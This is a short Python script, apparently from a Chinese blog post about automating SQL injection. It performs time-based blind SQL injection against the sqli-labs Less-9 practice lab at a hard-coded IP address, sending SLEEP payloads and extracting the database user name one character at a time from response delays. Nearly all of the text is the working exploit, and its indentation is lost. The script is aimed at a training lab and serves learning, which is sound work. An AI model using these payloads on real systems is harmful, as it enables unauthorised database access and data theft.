# -*- coding: utf-8 -*-
import time
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz@'
for i in range(1, 19):
for payload in payloads:
s = " AND (SELECT * FROM (SELECT (SLEEP (5- (IF(ascii(substr(user(),%s,1))=%s, 2, 5)))))a)" \
% (i, ord(payload))
s = "/sqli-labs-master/Less-9/?id=1'" + s
start_time = time.time()
d = requests.get('http://111.230.43.239' + s + '%23')
# print d.url
if time.time() - start_time >= 3:
print payload
break
SQL注入之python自动化查找当前数据库用户名
最新推荐文章于 2024-05-17 20:36:02 发布